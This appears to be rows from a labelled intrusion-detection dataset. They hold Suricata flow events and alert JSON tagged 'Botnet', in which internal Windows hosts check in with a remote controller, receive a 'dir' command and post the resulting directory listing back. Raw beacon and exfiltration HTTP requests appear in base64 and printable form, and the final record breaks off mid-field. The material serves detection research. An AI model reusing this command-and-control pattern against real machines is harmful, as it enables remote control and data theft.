event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4367640, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:21:36
80,092
Friday
[{'timestamp': '2017-07-07T13:21:36.724435+0000', 'flow_id': 1825741387913327, 'pcap_cnt': 4367640, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2401, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:21:36.645231+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoJANAAIAGmSPAqAoJza6lSQlhH5DPA2VP/d8/X1ARAQDWpgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:21:36.724435+0000', 'flow_id': 1825741387913327, 'pcap_cnt': 4367640, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2401, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:21:36.645231+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoJANAAIAGmSPAqAoJza6lSQlhH5DPA2VP/d8/X1ARAQDWpgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,244,839
192.168.10.15-52234-205.174.165.73-8080-6
['flow', 'http', 'fileinfo']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 6, flow_pkts_toclient: 5, flow_bytes_toserver: 555, flow_bytes_toclient: 428, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4393828, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 3 ; pcap_cnt: 4393830, event_type: fileinfo, proto: TCP, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 3, app_proto: http, fileinfo_filename: /api/pop, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 3, fileinfo_tx_id: 0
true
Botnet
true
13:22:08
197,716
Friday
[{'timestamp': '2017-07-07T13:22:08.356671+0000', 'flow_id': 2101950736790100, 'pcap_cnt': 4393828, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52234, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 3, 'http_response_body_printable': 'dir', 'http_response_body': 'ZGly'}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 435, 'bytes_toclient': 368, 'start': '2017-07-07T13:22:08.160340+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobjZAAIAGTurAqAoPza6lScwKH5Cgr8sLZ3S0QVAQAQD+GAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:22:08.356671+0000', 'flow_id': 2101950736790100, 'pcap_cnt': 4393828, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52234, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 3, 'http_response_body_printable': 'dir', 'http_response_body': 'ZGly'}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 435, 'bytes_toclient': 368, 'start': '2017-07-07T13:22:08.160340+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobjZAAIAGTurAqAoPza6lScwKH5Cgr8sLZ3S0QVAQAQD+GAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
509
attack
1,246,087
192.168.10.15-52235-205.174.165.73-8080-6
['flow', 'http', 'fileinfo']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 1341, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4396203, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/report, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: POST, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 ; pcap_cnt: 4396203, event_type: fileinfo, proto: TCP, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/report, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: POST, http_protocol: HTTP/1.1, http_status: 200, http_length: 0, app_proto: http, fileinfo_filename: /api/report, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 810, fileinfo_tx_id: 0
true
Botnet
true
13:22:09
67,395
Friday
[{'timestamp': '2017-07-07T13:22:09.227437+0000', 'flow_id': 1463031401903094, 'pcap_cnt': 4396203, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52235, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/report', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'POST', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0, 'http_request_body_printable': 'output=+Volume+in+drive+C+has+no+label.%0A+Volume+Serial+Number+is+A471-B674%0A%0A+Directory+of+C%3A%5CUsers%5Ccic4%5CDownloads%0A%0A2017-07-07++10%3A08+AM++++%3CDIR%3E++++++++++.%0A2017-07-07++10%3A08+AM++++%3CDIR%3E++++++++++..%0A2017-07-07++10%3A08+AM++++++++17%2C951%2C465+agent%281%29.exe%0A2017-07-07++10%3A06+AM++++++++17%2C951%2C465+agent.exe%0A2017-06-27++02%3A36+PM+++++++++++266%2C248+Firefox+Setup+Stub+54.0.exe%0A2017-06-27++02%3A39+PM+++++++++++738%2C368+JavaSetup8u131.exe%0A2017-06-15++10%3A08+AM++++++++++++++++79+windump+command.txt%0A2017-03-22++07%3A32+PM+++++++++++569%2C344+WinDump.exe%0A2017-03-22++07%3A22+PM+++++++++++915%2C128+WinPcap_4_1_3.exe%0A+++++++++++++++7+File%28s%29+++++38%2C392%2C097+bytes%0A+++++++++++++++2+Dir%28s%29++124%2C437%2C569%2C536+bytes+free%0A&botid=mitacs-pc4', 'http_request_body': 'b3V0cHV0PStWb2x1bWUraW4rZHJpdmUrQytoYXMrbm8rbGFiZWwuJTBBK1ZvbHVtZStTZXJpYWwrTnVtYmVyK2lzK0E0NzEtQjY3NCUwQSUwQStEaXJlY3Rvcnkrb2YrQyUzQSU1Q1VzZXJzJTVDY2ljNCU1Q0Rvd25sb2FkcyUwQSUwQTIwMTctMDctMDcrKzEwJTNBMDgrQU0rKysrJTNDRElSJTNFKysrKysrKysrKy4lMEEyMDE3LTA3LTA3KysxMCUzQTA4K0FNKysrKyUzQ0RJUiUzRSsrKysrKysrKysuLiUwQTIwMTctMDctMDcrKzEwJTNBMDgrQU0rKysrKysrKzE3JTJDOTUxJTJDNDY1K2FnZW50JTI4MSUyOS5leGUlMEEyMDE3LTA3LTA3KysxMCUzQTA2K0FNKysrKysrKysxNyUyQzk1MSUyQzQ2NSthZ2VudC5leGUlMEEyMDE3LTA2LTI3KyswMiUzQTM2K1BNKysrKysrKysrKysyNjYlMkMyNDgrRmlyZWZveCtTZXR1cCtTdHViKzU0LjAuZXhlJTBBMjAxNy0wNi0yNysrMDIlM0EzOStQTSsrKysrKysrKysrNzM4JTJDMzY4K0phdmFTZXR1cDh1MTMxLmV4ZSUwQTIwMTctMDYtMTUrKzEwJTNBMDgrQU0rKysrKysrKysrKysrKysrNzkrd2luZHVtcCtjb21tYW5kLnR4dCUwQTIwMTctMDMtMjIrKzA3JTNBMzIrUE0rKysrKysrKysrKzU2OSUyQzM0NCtXaW5EdW1wLmV4ZSUwQTIwMTctMDMtMjIrKzA3JTNBMjIrUE0rKysrKysrKysrKzkxNSUyQzEyOCtXaW5QY2FwXzRfMV8zLmV4ZSUwQSsrKysrKysrKysrKysrKzcrRmlsZSUyOHMlMjkrKysrKzM4JTJDMzkyJTJDMDk3K2J5dGVzJTBBKysrKysrKysrKysrKysrMitEaXIlMjhzJTI5KysxMjQlMkM0MzclMkM1NjklMkM1MzYrYnl0ZXMrZnJlZSUwQSZib3RpZD1taXRhY3MtcGM0'}, 'files': [{'filename': '/api/report', 'sid': [], 'gaps': False, 'state': 'CLOSED', 'stored': False, 'size': 810, 'tx_id': 0}], 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 1281, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:09.160758+0000'}, 'payload': 'UE9TVCAvYXBpL3JlcG9ydCBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KQ29udGVudC1MZW5ndGg6IDgxMA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb3V0cHV0PStWb2x1bWUraW4rZHJpdmUrQytoYXMrbm8rbGFiZWwuJTBBK1ZvbHVtZStTZXJpYWwrTnVtYmVyK2lzK0E0NzEtQjY3NCUwQSUwQStEaXJlY3Rvcnkrb2YrQyUzQSU1Q1VzZXJzJTVDY2ljNCU1Q0Rvd25sb2FkcyUwQSUwQTIwMTctMDctMDcrKzEwJTNBMDgrQU0rKysrJTNDRElSJTNFKysrKysrKysrKy4lMEEyMDE3LTA3LTA3KysxMCUzQTA4K0FNKysrKyUzQ0RJUiUzRSsrKysrKysrKysuLiUwQTIwMTctMDctMDcrKzEwJTNBMDgrQU0rKysrKysrKzE3JTJDOTUxJTJDNDY1K2FnZW50JTI4MSUyOS5leGUlMEEyMDE3LTA3LTA3KysxMCUzQTA2K0FNKysrKysrKysxNyUyQzk1MSUyQzQ2NSthZ2VudC5leGUlMEEyMDE3LTA2LTI3KyswMiUzQTM2K1BNKysrKysrKysrKysyNjYlMkMyNDgrRmlyZWZveCtTZXR1cCtTdHViKzU0LjAuZXhlJTBBMjAxNy0wNi0yNysrMDIlM0EzOStQTSsrKysrKysrKysrNzM4JTJDMzY4K0phdmFTZXR1cDh1MTMxLmV4ZSUwQTIwMTctMDYtMTUrKzEwJTNBMDgrQU0rKysrKysrKysrKysrKysrNzkrd2luZHVtcCtjb21tYW5kLnR4dCUwQTIwMTctMDMtMjIrKzA3JTNBMzIrUE0rKysrKysrKysrKzU2OSUyQzM0NCtXaW5EdW1wLmV4ZSUwQTIwMTctMDMtMjIrKzA3JTNBMjIrUE0rKysrKysrKysrKzkxNSUyQzEyOCtXaW5QY2FwXzRfMV8zLmV4ZSUwQSsrKysrKysrKysrKysrKzcrRmlsZSUyOHMlMjkrKysrKzM4JTJDMzkyJTJDMDk3K2J5dGVzJTBBKysrKysrKysrKysrKysrMitEaXIlMjhzJTI5KysxMjQlMkM0MzclMkM1NjklMkM1MzYrYnl0ZXMrZnJlZSUwQSZib3RpZD1taXRhY3MtcGM0', 'payload_printable': 'POST /api/report HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\nContent-Length: 810\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\noutput=+Volume+in+drive+C+has+no+label.%0A+Volume+Serial+Number+is+A471-B674%0A%0A+Directory+of+C%3A%5CUsers%5Ccic4%5CDownloads%0A%0A2017-07-07++10%3A08+AM++++%3CDIR%3E++++++++++.%0A2017-07-07++10%3A08+AM++++%3CDIR%3E++++++++++..%0A2017-07-07++10%3A08+AM++++++++17%2C951%2C465+agent%281%29.exe%0A2017-07-07++10%3A06+AM++++++++17%2C951%2C465+agent.exe%0A2017-06-27++02%3A36+PM+++++++++++266%2C248+Firefox+Setup+Stub+54.0.exe%0A2017-06-27++02%3A39+PM+++++++++++738%2C368+JavaSetup8u131.exe%0A2017-06-15++10%3A08+AM++++++++++++++++79+windump+command.txt%0A2017-03-22++07%3A32+PM+++++++++++569%2C344+WinDump.exe%0A2017-03-22++07%3A22+PM+++++++++++915%2C128+WinPcap_4_1_3.exe%0A+++++++++++++++7+File%28s%29+++++38%2C392%2C097+bytes%0A+++++++++++++++2+Dir%28s%29++124%2C437%2C569%2C536+bytes+free%0A&botid=mitacs-pc4', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobjxAAIAGTuTAqAoPza6lScwLH5Aq81fJHKXjilARAQACnAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:22:09.227437+0000', 'flow_id': 1463031401903094, 'pcap_cnt': 4396203, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52235, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829853, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M3', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_09_16']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/report', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'POST', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0, 'http_request_body_printable': 'output=+Volume+in+drive+C+has+no+label.%0A+Volume+Serial+Number+is+A471-B674%0A%0A+Directory+of+C%3A%5CUsers%5Ccic4%5CDownloads%0A%0A2017-07-07++10%3A08+AM++++%3CDIR%3E++++++++++.%0A2017-07-07++10%3A08+AM++++%3CDIR%3E++++++++++..%0A2017-07-07++10%3A08+AM++++++++17%2C951%2C465+agent%281%29.exe%0A2017-07-07++10%3A06+AM++++++++17%2C951%2C465+agent.exe%0A2017-06-27++02%3A36+PM+++++++++++266%2C248+Firefox+Setup+Stub+54.0.exe%0A2017-06-27++02%3A39+PM+++++++++++738%2C368+JavaSetup8u131.exe%0A2017-06-15++10%3A08+AM++++++++++++++++79+windump+command.txt%0A2017-03-22++07%3A32+PM+++++++++++569%2C344+WinDump.exe%0A2017-03-22++07%3A22+PM+++++++++++915%2C128+WinPcap_4_1_3.exe%0A+++++++++++++++7+File%28s%29+++++38%2C392%2C097+bytes%0A+++++++++++++++2+Dir%28s%29++124%2C437%2C569%2C536+bytes+free%0A&botid=mitacs-pc4', 'http_request_body': 'b3V0cHV0PStWb2x1bWUraW4rZHJpdmUrQytoYXMrbm8rbGFiZWwuJTBBK1ZvbHVtZStTZXJpYWwrTnVtYmVyK2lzK0E0NzEtQjY3NCUwQSUwQStEaXJlY3Rvcnkrb2YrQyUzQSU1Q1VzZXJzJTVDY2ljNCU1Q0Rvd25sb2FkcyUwQSUwQTIwMTctMDctMDcrKzEwJTNBMDgrQU0rKysrJTNDRElSJTNFKysrKysrKysrKy4lMEEyMDE3LTA3LTA3KysxMCUzQTA4K0FNKysrKyUzQ0RJUiUzRSsrKysrKysrKysuLiUwQTIwMTctMDctMDcrKzEwJTNBMDgrQU0rKysrKysrKzE3JTJDOTUxJTJDNDY1K2FnZW50JTI4MSUyOS5leGUlMEEyMDE3LTA3LTA3KysxMCUzQTA2K0FNKysrKysrKysxNyUyQzk1MSUyQzQ2NSthZ2VudC5leGUlMEEyMDE3LTA2LTI3KyswMiUzQTM2K1BNKysrKysrKysrKysyNjYlMkMyNDgrRmlyZWZveCtTZXR1cCtTdHViKzU0LjAuZXhlJTBBMjAxNy0wNi0yNysrMDIlM0EzOStQTSsrKysrKysrKysrNzM4JTJDMzY4K0phdmFTZXR1cDh1MTMxLmV4ZSUwQTIwMTctMDYtMTUrKzEwJTNBMDgrQU0rKysrKysrKysrKysrKysrNzkrd2luZHVtcCtjb21tYW5kLnR4dCUwQTIwMTctMDMtMjIrKzA3JTNBMzIrUE0rKysrKysrKysrKzU2OSUyQzM0NCtXaW5EdW1wLmV4ZSUwQTIwMTctMDMtMjIrKzA3JTNBMjIrUE0rKysrKysrKysrKzkxNSUyQzEyOCtXaW5QY2FwXzRfMV8zLmV4ZSUwQSsrKysrKysrKysrKysrKzcrRmlsZSUyOHMlMjkrKysrKzM4JTJDMzkyJTJDMDk3K2J5dGVzJTBBKysrKysrKysrKysrKysrMitEaXIlMjhzJTI5KysxMjQlMkM0MzclMkM1NjklMkM1MzYrYnl0ZXMrZnJlZSUwQSZib3RpZD1taXRhY3MtcGM0'}, 'files': [{'filename': '/api/report', 'sid': [], 'gaps': False, 'state': 'CLOSED', 'stored': False, 'size': 810, 'tx_id': 0}], 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 1281, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:09.160758+0000'}, 'payload': 'UE9TVCAvYXBpL3JlcG9ydCBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KQ29udGVudC1MZW5ndGg6IDgxMA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb3V0cHV0PStWb2x1bWUraW4rZHJpdmUrQytoYXMrbm8rbGFiZWwuJTBBK1ZvbHVtZStTZXJpYWwrTnVtYmVyK2lzK0E0NzEtQjY3NCUwQSUwQStEaXJlY3Rvcnkrb2YrQyUzQSU1Q1VzZXJzJTVDY2ljNCU1Q0Rvd25sb2FkcyUwQSUwQTIwMTctMDctMDcrKzEwJTNBMDgrQU0rKysrJTNDRElSJTNFKysrKysrKysrKy4lMEEyMDE3LTA3LTA3KysxMCUzQTA4K0FNKysrKyUzQ0RJUiUzRSsrKysrKysrKysuLiUwQTIwMTctMDctMDcrKzEwJTNBMDgrQU0rKysrKysrKzE3JTJDOTUxJTJDNDY1K2FnZW50JTI4MSUyOS5leGUlMEEyMDE3LTA3LTA3KysxMCUzQTA2K0FNKysrKysrKysxNyUyQzk1MSUyQzQ2NSthZ2VudC5leGUlMEEyMDE3LTA2LTI3KyswMiUzQTM2K1BNKysrKysrKysrKysyNjYlMkMyNDgrRmlyZWZveCtTZXR1cCtTdHViKzU0LjAuZXhlJTBBMjAxNy0wNi0yNysrMDIlM0EzOStQTSsrKysrKysrKysrNzM4JTJDMzY4K0phdmFTZXR1cDh1MTMxLmV4ZSUwQTIwMTctMDYtMTUrKzEwJTNBMDgrQU0rKysrKysrKysrKysrKysrNzkrd2luZHVtcCtjb21tYW5kLnR4dCUwQTIwMTctMDMtMjIrKzA3JTNBMzIrUE0rKysrKysrKysrKzU2OSUyQzM0NCtXaW5EdW1wLmV4ZSUwQTIwMTctMDMtMjIrKzA3JTNBMjIrUE0rKysrKysrKysrKzkxNSUyQzEyOCtXaW5QY2FwXzRfMV8zLmV4ZSUwQSsrKysrKysrKysrKysrKzcrRmlsZSUyOHMlMjkrKysrKzM4JTJDMzkyJTJDMDk3K2J5dGVzJTBBKysrKysrKysrKysrKysrMitEaXIlMjhzJTI5KysxMjQlMkM0MzclMkM1NjklMkM1MzYrYnl0ZXMrZnJlZSUwQSZib3RpZD1taXRhY3MtcGM0', 'payload_printable': 'POST /api/report HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\nContent-Length: 810\r\nContent-Type: 